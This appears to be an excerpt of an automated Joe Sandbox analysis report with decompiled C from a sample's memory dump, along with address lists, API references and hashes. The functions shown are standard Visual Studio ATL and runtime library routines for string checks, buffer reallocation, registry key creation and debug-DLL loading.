                      0x00956242
                      0x00956248
                      0x0095624b
                      0x00956252
                      0x009562d9
                      0x009562e0
                      0x009562e8
                      0x009562e8
                      0x009562eb
                      0x009562ee
                      0x009562ee
                      0x009562f1
                      0x009562fa
                      0x009562fc
                      0x00956303
                      0x0095630b
                      0x00956311
                      0x00956324
                      0x00956330
                      0x0095633c
                      0x0095633c
                      0x00956303
                      0x00956344
                      0x00956347
                      0x0095634e
                      0x00956353
                      0x00956364
                      0x00956364
                      0x0095625b
                      0x00956265
                      0x0095629c
                      0x009562a3
                      0x009562b7
                      0x009562bd
                      0x009562bd
                      0x009562c0
                      0x009562cb
                      0x009562cf
                      0x009562d4
                      0x009562d4
                      0x009562d7
                      0x00000000
                      0x009562d7
                      0x009562a5
                      0x009562a8
                      0x009562af
                      0x009562b2
                      0x00000000
                      0x009562b2
                      0x0095626e
                      0x00000000
                      0x00000000
                      0x00956276
                      0x00956280
                      0x00000000
                      0x00000000
                      0x00956285
                      0x0095628c
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000

                      APIs
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 0095634E
                      Strings
                      • pThis->m_pCurrentMsg == &msg, xrefs: 0095621F
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h, xrefs: 00956230
                      • %ls, xrefs: 00956224
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CheckStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h$pThis->m_pCurrentMsg == &msg
                      • API String ID: 930174750-2182017553
                      • Opcode ID: 624bda0b31088cb79a0ab72d5a9ac0a006b26848f5a06a451cac67b3863fbe5d
                      • Instruction ID: c260a07f077a701b446a52089fccbad7a8a1997bad169290f5752502be5540b5
                      • Opcode Fuzzy Hash: 624bda0b31088cb79a0ab72d5a9ac0a006b26848f5a06a451cac67b3863fbe5d
                      • Instruction Fuzzy Hash: 88614675E00208EFCB18DF99D591AADB7B6FF88305F248159E915AB391C730AE46DF80
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009470C0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 156COMMON
                      Download Yara Rule
                      C-Code - Quality: 76%
                      			E009470C0(void* __ecx, char* __edx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v24;
				char _v36;
				char* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v56;
				intOrPtr _t48;
				intOrPtr _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t58;
				void* _t62;
				void* _t64;
				void* _t65;
				void* _t66;
				intOrPtr _t70;
				intOrPtr _t81;
				char* _t82;
				void* _t91;
				void* _t92;
				void* _t93;

				_t82 = __edx;
				_push(__ecx);
				memset( &_v56, 0xcccccccc, 0xd << 2);
				_t93 = _t92 + 0xc;
				_pop(_t70);
				_v8 = _t70;
				do {
					if(_a8 < 0) {
						_v52 = 0;
					} else {
						_v52 = 1;
					}
					_v12 = _v52;
					_t96 = _v12;
					if(_v12 == 0) {
						_t66 = L00994930(_t96, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlstr.h", 0x70, 0, "%ls", L"__atl_condVal");
						_t93 = _t93 + 0x18;
						if(_t66 == 1) {
							asm("int3");
						}
					}
					if(_v12 != 0) {
						goto L9;
					}
					_t54 = 0;
					L31:
					_push(_t82);
					E009D14C0(_t91, 0x947274);
					_t56 = _t54;
					return E009D1520(_t56, _t91 - _t93 + 0x34);
					L9:
					_t82 = 0;
					__eflags = 0;
				} while (0 != 0);
				__eflags =  *_a4 - _v8;
				if(__eflags != 0) {
					_t65 = L00994930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlstr.h", 0x71, 0, "%ls", L"pData->pStringMgr == this");
					_t93 = _t93 + 0x18;
					__eflags = _t65 - 1;
					if(_t65 == 1) {
						asm("int3");
					}
				}
				_t48 = E00951ED0( &_a8,  &_a8, _a8, 1);
				_t93 = _t93 + 0xc;
				__eflags = _t48;
				if(_t48 >= 0) {
					_t82 = _a8;
					_v44 = L00951F10(_t82, 8);
					while(1) {
						__eflags = _a8 - _v44;
						if(_a8 > _v44) {
							_v56 = 0;
						} else {
							_v56 = 1;
						}
						_v48 = _v56;
						__eflags = _v48;
						if(__eflags == 0) {
							_t64 = L00994930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlstr.h", 0x7d, 0, "%ls", L"__atl_condVal");
							_t93 = _t93 + 0x18;
							__eflags = _t64 - 1;
							if(_t64 == 1) {
								asm("int3");
							}
						}
						__eflags = _v48;
						if(_v48 == 0) {
							break;
						}
						__eflags = 0;
						if(0 != 0) {
							continue;
						}
						_t82 = _v44;
						_t53 = E00941860(_a12,  &_v36, _t82, _a12);
						_t93 = _t93 + 0xc;
						__eflags = _t53;
						if(_t53 < 0) {
							L27:
							_t54 = 0;
							goto L31;
						}
						_t82 =  &_v24;
						_t58 = E009516D0(_t53, _v36, _t82, 0x10, _v36);
						_t93 = _t93 + 0xc;
						__eflags = _t58;
						if(_t58 >= 0) {
							_t82 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 4))));
							_t62 =  *((intOrPtr*)( *((intOrPtr*)(_t82 + 8))))(_a4, _v24);
							__eflags = _t93 - _t93;
							_v16 = E009D1520(_t62, _t93 - _t93);
							__eflags = _v16;
							if(_v16 != 0) {
								_t81 = _v44 - 1;
								__eflags = _t81;
								_t82 = _v16;
								 *((intOrPtr*)(_t82 + 8)) = _t81;
								_t54 = _v16;
							} else {
								_t54 = 0;
							}
							goto L31;
						}
						goto L27;
					}
					_t54 = 0;
				} else {
					_t54 = 0;
				}
			}



























                      0x009470c0
                      0x009470c8
                      0x009470d6
                      0x009470d6
                      0x009470d8
                      0x009470d9
                      0x009470dc
                      0x009470e0
                      0x009470eb
                      0x009470e2
                      0x009470e2
                      0x009470e2
                      0x009470f5
                      0x009470f8
                      0x009470fc
                      0x00947113
                      0x00947118
                      0x0094711e
                      0x00947120
                      0x00947120
                      0x0094711e
                      0x00947125
                      0x00000000
                      0x00000000
                      0x00947127
                      0x00947251
                      0x00947251
                      0x0094725b
                      0x00947260
                      0x00947271
                      0x0094712e
                      0x0094712e
                      0x0094712e
                      0x0094712e
                      0x00947137
                      0x0094713a
                      0x00947151
                      0x00947156
                      0x00947159
                      0x0094715c
                      0x0094715e
                      0x0094715e
                      0x0094715c
                      0x00947169
                      0x0094716e
                      0x00947171
                      0x00947173
                      0x0094717e
                      0x00947187
                      0x0094718a
                      0x0094718d
                      0x00947190
                      0x0094719b
                      0x00947192
                      0x00947192
                      0x00947192
                      0x009471a5
                      0x009471a8
                      0x009471ac
                      0x009471c3
                      0x009471c8
                      0x009471cb
                      0x009471ce
                      0x009471d0
                      0x009471d0
                      0x009471ce
                      0x009471d1
                      0x009471d5
                      0x00000000
                      0x00000000
                      0x009471db
                      0x009471dd
                      0x00000000
                      0x00000000
                      0x009471e3
                      0x009471eb
                      0x009471f0
                      0x009471f3
                      0x009471f5
                      0x0094720d
                      0x0094720d
                      0x00000000
                      0x0094720d
                      0x009471fd
                      0x00947201
                      0x00947206
                      0x00947209
                      0x0094720b
                      0x00947224
                      0x0094722c
                      0x0094722e
                      0x00947235
                      0x00947238
                      0x0094723c
                      0x00947245
                      0x00947245
                      0x00947248
                      0x0094724b
                      0x0094724e
                      0x0094723e
                      0x0094723e
                      0x0094723e
                      0x00000000
                      0x0094723c
                      0x00000000
                      0x0094720b
                      0x009471d7
                      0x00947175
                      0x00947175
                      0x00947175

                      APIs
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 0094725B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CheckStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlstr.h$__atl_condVal$pData->pStringMgr == this
                      • API String ID: 930174750-2123114947
                      • Opcode ID: 7ab23848f071b19b1d8406b4d44a37a868719dbe2fceafc4b2ec7bf8e1129293
                      • Instruction ID: 6890ac51b81d9acc2c44c83afba3fab9a8e015d3dbea4a93ef0e4c30f24d4f5e
                      • Opcode Fuzzy Hash: 7ab23848f071b19b1d8406b4d44a37a868719dbe2fceafc4b2ec7bf8e1129293
                      • Instruction Fuzzy Hash: 0F518175E5820CABDB14DBE4DC86FEEF3B8AB88708F108519F915B7281D7B4E9448B50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00952DE0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 153COMMON
                      Download Yara Rule
                      C-Code - Quality: 62%
                      			E00952DE0(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t51;
				void* _t54;
				void* _t55;
				intOrPtr _t62;
				void* _t67;
				void* _t86;
				void* _t87;
				void* _t88;
				void* _t89;

				_t87 = __esi;
				_t86 = __edi;
				_t67 = __ebx;
				_v32 = 0xcccccccc;
				_v28 = 0xcccccccc;
				_v24 = 0xcccccccc;
				_v20 = 0xcccccccc;
				_v16 = 0xcccccccc;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				do {
					if(_a4 == 0) {
						_v24 = 0;
					} else {
						_v24 = 1;
					}
					_v8 = _v24;
					do {
						_t92 = _v8;
						if(_v8 == 0) {
							_t51 = L00994930(_t92, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlconv.h", 0x71, 0, "%ls", L"__atl_condVal");
							_t89 = _t89 + 0x18;
							if(_t51 == 1) {
								asm("int3");
							}
						}
					} while (0 != 0);
					_t95 = _v8;
					if(_v8 == 0) {
						E00942500(_t67, _t86, _t87, _t95, 0x80070057);
					}
				} while (0 != 0);
				do {
					if(_a8 < 0) {
						_v28 = 0;
					} else {
						_v28 = 1;
					}
					_v12 = _v28;
					do {
						_t98 = _v12;
						if(_v12 == 0) {
							_t54 = L00994930(_t98, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlconv.h", 0x72, 0, "%ls", L"__atl_condVal");
							_t89 = _t89 + 0x18;
							if(_t54 == 1) {
								asm("int3");
							}
						}
					} while (0 != 0);
					_t101 = _v12;
					if(_v12 == 0) {
						E00942500(_t67, _t86, _t87, _t101, 0x80070057);
					}
				} while (0 != 0);
				do {
					if(_a12 == 0) {
						_v32 = 0;
					} else {
						_v32 = 1;
					}
					_v16 = _v32;
					do {
						_t104 = _v16;
						if(_v16 == 0) {
							_t55 = L00994930(_t104, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlconv.h", 0x73, 0, "%ls", L"__atl_condVal");
							_t89 = _t89 + 0x18;
							if(_t55 == 1) {
								asm("int3");
							}
						}
					} while (0 != 0);
					_t107 = _v16;
					if(_v16 == 0) {
						E00942500(_t67, _t86, _t87, _t107, 0x80070057);
					}
				} while (0 != 0);
				if( *_a4 == _a12) {
					__eflags = _a8 - _a16;
					if(__eflags <= 0) {
						_t58 = _a4;
						 *_a4 = _a12;
					} else {
						_t58 = E0096B960(_a8, 1);
						_t89 = _t89 + 8;
						 *_a4 = _t58;
					}
				} else {
					if(_a8 <= _a16) {
						_t58 = E00994B40( *_a4);
						_t89 = _t89 + 4;
						 *_a4 = _a12;
					} else {
						_t62 = E00992210( *_a4, _a8, 1);
						_t89 = _t89 + 0xc;
						_v20 = _t62;
						_t111 = _v20;
						if(_v20 == 0) {
							E00942500(_t67, _t86, _t87, _t111, 0x8007000e);
						}
						_t58 = _a4;
						 *_a4 = _v20;
					}
				}
				_t112 =  *_a4;
				if( *_a4 == 0) {
					_t58 = E00942500(_t67, _t86, _t87, _t112, 0x8007000e);
				}
				return E009D1520(_t58, _t88 - _t89 + 0x1c);
			}



















                      0x00952de0
                      0x00952de0
                      0x00952de0
                      0x00952deb
                      0x00952dee
                      0x00952df1
                      0x00952df4
                      0x00952df7
                      0x00952dfa
                      0x00952dfd
                      0x00952e00
                      0x00952e04
                      0x00952e0f
                      0x00952e06
                      0x00952e06
                      0x00952e06
                      0x00952e19
                      0x00952e1c
                      0x00952e1c
                      0x00952e20
                      0x00952e37
                      0x00952e3c
                      0x00952e42
                      0x00952e44
                      0x00952e44
                      0x00952e42
                      0x00952e45
                      0x00952e49
                      0x00952e4d
                      0x00952e54
                      0x00952e54
                      0x00952e59
                      0x00952e5d
                      0x00952e61
                      0x00952e6c
                      0x00952e63
                      0x00952e63
                      0x00952e63
                      0x00952e76
                      0x00952e79
                      0x00952e79
                      0x00952e7d
                      0x00952e94
                      0x00952e99
                      0x00952e9f
                      0x00952ea1
                      0x00952ea1
                      0x00952e9f
                      0x00952ea2
                      0x00952ea6
                      0x00952eaa
                      0x00952eb1
                      0x00952eb1
                      0x00952eb6
                      0x00952eba
                      0x00952ebe
                      0x00952ec9
                      0x00952ec0
                      0x00952ec0
                      0x00952ec0
                      0x00952ed3
                      0x00952ed6
                      0x00952ed6
                      0x00952eda
                      0x00952ef1
                      0x00952ef6
                      0x00952efc
                      0x00952efe
                      0x00952efe
                      0x00952efc
                      0x00952eff
                      0x00952f03
                      0x00952f07
                      0x00952f0e
                      0x00952f0e
                      0x00952f13
                      0x00952f1f
                      0x00952f75
                      0x00952f78
                      0x00952f8f
                      0x00952f95
                      0x00952f7a
                      0x00952f80
                      0x00952f85
                      0x00952f8b
                      0x00952f8b
                      0x00952f21
                      0x00952f27
                      0x00952f60
                      0x00952f65
                      0x00952f6e
                      0x00952f29
                      0x00952f35
                      0x00952f3a
                      0x00952f3d
                      0x00952f40
                      0x00952f44
                      0x00952f4b
                      0x00952f4b
                      0x00952f50
                      0x00952f56
                      0x00952f56
                      0x00952f70
                      0x00952f9a
                      0x00952f9d
                      0x00952fa4
                      0x00952fa4
                      0x00952fb6

                      APIs
                      • __wdupenv_s.LIBCMTD ref: 00952F35
                        • Part of subcall function 00942500: _Smanip.LIBCPMTD ref: 0094253B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Smanip__wdupenv_s
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlconv.h$__atl_condVal
                      • API String ID: 167151435-2826139414
                      • Opcode ID: cefd4a2cecdb199b248a9c862750260edbe6171c2b30e47f57313e3d7af73592
                      • Instruction ID: 0aa5bdbb69df8b755400ebf89f8a9495833c8d16a418833e4e4ff92a7bceda93
                      • Opcode Fuzzy Hash: cefd4a2cecdb199b248a9c862750260edbe6171c2b30e47f57313e3d7af73592
                      • Instruction Fuzzy Hash: F2516C70E00209EFDF10DF65D847BAE7774AB5671AF208519FD04AB281E3B49A98CF91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00944490 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 110registryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 87%
                      			E00944490(char** __ecx, void* __esi, void* _a4, char* _a8, char* _a12, int _a16, int _a20, struct _SECURITY_ATTRIBUTES* _a24, intOrPtr* _a28) {
				char** _v8;
				char** _v12;
				int _v16;
				char** _v20;
				char** _v24;
				void* _v28;
				char** _v32;
				char** _v36;
				char** _v40;
				long _t53;
				void* _t57;
				void* _t67;
				char* _t83;
				void* _t90;
				void* _t91;

				_t89 = __esi;
				_v40 = 0xcccccccc;
				_v36 = 0xcccccccc;
				_v32 = 0xcccccccc;
				_v28 = 0xcccccccc;
				_v24 = 0xcccccccc;
				_v20 = 0xcccccccc;
				_v16 = 0xcccccccc;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				_t93 = _a4;
				if(_a4 == 0) {
					_t67 = L00994930(_t93, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x16e2, 0, "%ls", L"hKeyParent != 0");
					_t91 = _t91 + 0x18;
					if(_t67 == 1) {
						asm("int3");
					}
				}
				_v28 = 0;
				if(_v8[2] == 0) {
					_t89 = _t91;
					_t83 = _a8;
					_t53 = RegCreateKeyExA(_a4, _t83, 0, _a12, _a16, _a20, _a24,  &_v28,  &_v16);
					__eflags = _t91 - _t91;
					_v40 = E009D1520(_t53, _t91 - _t91);
				} else {
					_t83 = _a8;
					_v40 = E00943200(_v8[2], _t89, _a4, _t83, 0, _a12, _a16, _a20, _a24,  &_v28,  &_v16);
				}
				_v36 = _v40;
				if(_v36 == 0) {
					if(_a28 != 0) {
						 *_a28 = _v16;
					}
					_v36 = E00944420(_v8, _t89);
					_t83 = _v28;
					 *_v8 = _t83;
					_v8[1] = _a20 & 0x00000300;
				}
				_push(_t83);
				_push(_v36);
				E009D14C0(_t90, 0x9445bc);
				_pop(_t57);
				return E009D1520(_t57, _t90 - _t91 + 0x24);
			}


















                      0x00944490
                      0x0094449c
                      0x0094449f
                      0x009444a2
                      0x009444a5
                      0x009444a8
                      0x009444ab
                      0x009444ae
                      0x009444b1
                      0x009444b4
                      0x009444b7
                      0x009444ba
                      0x009444be
                      0x009444d8
                      0x009444dd
                      0x009444e3
                      0x009444e5
                      0x009444e5
                      0x009444e3
                      0x009444e6
                      0x009444f4
                      0x00944528
                      0x00944544
                      0x0094454c
                      0x00944552
                      0x00944559
                      0x009444f6
                      0x00944510
                      0x00944523
                      0x00944523
                      0x0094455f
                      0x00944566
                      0x0094456c
                      0x00944574
                      0x00944574
                      0x0094457e
                      0x00944584
                      0x00944587
                      0x00944594
                      0x00944594
                      0x0094459a
                      0x0094459d
                      0x009445a4
                      0x009445a9
                      0x009445b9

                      APIs
                      • RegCreateKeyExA.ADVAPI32(00000000,?,00000000,?,?,00000000,?,00000000,?), ref: 0094454C
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 009445A4
                      Strings
                      • %ls, xrefs: 009444C5
                      • hKeyParent != 0, xrefs: 009444C0
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 009444D1
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CheckCreateStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$hKeyParent != 0
                      • API String ID: 2215485779-2309544881
                      • Opcode ID: ffed914080337fb1cd0f5e12557b64b4d812964713e57f6ffbd7a6c92d751b81
                      • Instruction ID: 214e76f6051577fcd801e509337664ad350d8ce92832349bd25e7d0475f74fd5
                      • Opcode Fuzzy Hash: ffed914080337fb1cd0f5e12557b64b4d812964713e57f6ffbd7a6c92d751b81
                      • Instruction Fuzzy Hash: 3041D7B5E00209AFCB44DF98D891FEEB7F9AB88304F208159F509A7250E7759A41CBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009D1C50 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 99COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 94%
                      			E009D1C50(void* __ebx, void* __edx, void* __edi, void* __esi) {
				signed int _v8;
				char _v528;
				char _v1048;
				signed int _t13;
				void* _t17;
				void* _t27;
				void* _t30;
				void* _t42;
				signed int _t43;
				void* _t44;
				void* _t45;

				_t42 = __esi;
				_t41 = __edi;
				_t40 = __edx;
				_t34 = __ebx;
				_t13 =  *0xa0600c; // 0x5d529087
				_v8 = _t13 ^ _t43;
				if( *0xb337c8 != 0) {
					L13:
					_t15 = 0;
					goto L14;
				} else {
					 *0xb337c8 = 1;
					if(E009D1DA0(__edx) != 0) {
						L14:
						return E00957280(_t15, _t34, _v8 ^ _t43, _t40, _t41, _t42);
					} else {
						_t17 = E009D24D0(L"VCRUNTIME140D.dll");
						_t45 = _t44 + 4;
						if(_t17 == 0) {
							L8:
							if(E009D24E0(L"MSPDB140", 0, 0xa00) != 0) {
								goto L14;
							} else {
								if(GetLastError() != 0x57 || E009D24B0(0,  &_v1048, 0x104) == 0 || E009D2000(_t34, _t41,  &_v1048,  &_v528, 0x104) == 0) {
									goto L13;
								} else {
									return E00957280(E009D24E0( &_v528, 0, 8), _t34, _v8 ^ _t43, _t40, _t41, _t42);
								}
							}
						} else {
							_t27 = E009D24B0(_t17,  &_v1048, 0x104);
							_t45 = _t45 + 0xc;
							if(_t27 == 0) {
								goto L8;
							} else {
								_t30 = E009D2000(__ebx, __edi,  &_v1048,  &_v528, 0x104);
								_t45 = _t45 + 0xc;
								if(_t30 == 0) {
									goto L8;
								} else {
									_t15 = E009D24E0( &_v528, 0, 0x900);
									_t45 = _t45 + 0xc;
									if(_t15 != 0) {
										goto L14;
									} else {
										if(GetLastError() != 0x57) {
											goto L8;
										} else {
											_t15 = E009D24E0( &_v528, 0, 8);
											_t45 = _t45 + 0xc;
											if(_t15 != 0) {
												goto L14;
											} else {
												goto L8;
											}
										}
									}
								}
							}
						}
					}
				}
			}














                      0x009d1c50
                      0x009d1c50
                      0x009d1c50
                      0x009d1c50
                      0x009d1c59
                      0x009d1c60
                      0x009d1c6a
                      0x009d1d8a
                      0x009d1d8a
                      0x00000000
                      0x009d1c70
                      0x009d1c70
                      0x009d1c7e
                      0x009d1d8c
                      0x009d1d99
                      0x009d1c84
                      0x009d1c89
                      0x009d1c8e
                      0x009d1c93
                      0x009d1d0d
                      0x009d1d23
                      0x00000000
                      0x009d1d25
                      0x009d1d2e
                      0x00000000
                      0x009d1d69
                      0x009d1d89
                      0x009d1d89
                      0x009d1d2e
                      0x009d1c95
                      0x009d1ca2
                      0x009d1ca7
                      0x009d1cac
                      0x00000000
                      0x009d1cae
                      0x009d1cc1
                      0x009d1cc6
                      0x009d1ccb
                      0x00000000
                      0x009d1ccd
                      0x009d1cdb
                      0x009d1ce0
                      0x009d1ce5
                      0x00000000
                      0x009d1ceb
                      0x009d1cf4
                      0x00000000
                      0x009d1cf6
                      0x009d1d01
                      0x009d1d06
                      0x009d1d0b
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x009d1d0b
                      0x009d1cf4
                      0x009d1ce5
                      0x009d1ccb
                      0x009d1cac
                      0x009d1c93
                      0x009d1c7e

                      APIs
                      • GetPdbDllFromInstallPath.LIBCMTD ref: 009D1C77
                        • Part of subcall function 009D1DA0: GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 009D1DE9
                        • Part of subcall function 009D1DA0: GetProcAddress.KERNEL32(00000000,RegOpenKeyExW), ref: 009D1E0F
                        • Part of subcall function 009D1DA0: GetProcAddress.KERNEL32(00000000,RegQueryValueExW), ref: 009D1E21
                        • Part of subcall function 009D1DA0: GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 009D1E33
                        • Part of subcall function 009D1DA0: FreeLibrary.KERNEL32(00000000), ref: 009D1E67
                        • Part of subcall function 009D24D0: GetModuleHandleW.KERNEL32(009D1C8E,?,009D1C8E,VCRUNTIME140D.dll), ref: 009D24D7
                      • GetLastError.KERNEL32 ref: 009D1CEB
                      • GetLastError.KERNEL32 ref: 009D1D25
                        • Part of subcall function 009D24B0: GetModuleFileNameW.KERNEL32(?,?,009D2111,?,009D2111,?,?,009D1975), ref: 009D24BF
                        • Part of subcall function 009D2000: __aligned_msize.LIBCMTD ref: 009D205F
                        • Part of subcall function 009D2000: __aligned_msize.LIBCMTD ref: 009D2079
                        • Part of subcall function 009D2000: __CrtDbgReportWV.LIBCMTD ref: 009D20A2
                        • Part of subcall function 009D24E0: LoadLibraryExW.KERNEL32(?,?,00000800,?,009D1DC7,api-ms-win-core-registry-l1-1-0.dll,00000000,00000800,?,?,00000000), ref: 009D24EF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
